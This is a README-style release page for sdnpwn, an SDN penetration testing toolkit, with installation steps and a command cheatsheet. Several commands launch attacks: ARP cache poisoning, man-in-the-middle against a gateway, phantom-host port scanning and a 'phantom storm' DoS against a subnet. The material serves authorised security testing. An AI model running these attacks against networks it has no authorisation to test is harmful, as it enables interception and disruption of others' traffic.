sdnpwn v1.7.0 releases: An SDN penetration testing toolkit

SDN penetration testing toolkit

sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs). For more information check out this article.

Installation
First download sdnpwn using git

git clone https://github.com/smythtech/sdnpwn

Make the sdnpwn.py and setup.sh scripts executable

sudo chmod +x sdnpwn.py
sudo chmod +x setup.sh

The setup.sh script takes care of installing the software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.

sudo ./setup.sh

Usage

Cheatsheet

Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.

Modules can be executed like so:

./sdnpwn.py <module name> <module options>

The mods module can be used to list all available modules:

./sdnpwn.py mods

More information about a certain module can be accessed using the info module:

./sdnpwn.py info mods

The above command would retrieve more information about the mods module, such as a description and available options.

Reconnaissance
arpmon

./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0
./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses

sdn-detect

./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.

controller-detect

./sdnpwn.py controller-detect -i eth0 --lldp #Test using LLDP messages observed at interface eth0
./sdnpwn.py controller-detect -t 192.168.0.3 #Test the northbound (NB) interface of the controller at 192.168.0.3

Management
help

./sdnpwn.py help #Print sdnpwn help

mods

./sdnpwn.py mods #Print a list of all executable modules
./sdnpwn.py mods -s lfa #Search modules for a module with “lfa” in its name
./sdnpwn.py mods -n new-mod #Create a new module named “new-mod”
./sdnpwn.py mods -r new-mod #Remove module named “new-mod”

info

./sdnpwn.py info test-mod #Print information for module named “test-mod”

system

./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

lfa-relay

./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
--tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel

lfa-scapy

./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script

dp-arp-poison

./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11

dp-mitm

./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway

phantom-host-scan

./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan

phantom-storm

./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets

Further Information
Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.

Disclaimer
This tool comes without warranty. The developers of this tool decline all responsibility for malicious or illegal use, and the impact caused by malicious or illegal use.

Copyright (c) 2017 Dylan Smyth
Source: https://github.com/smythtech/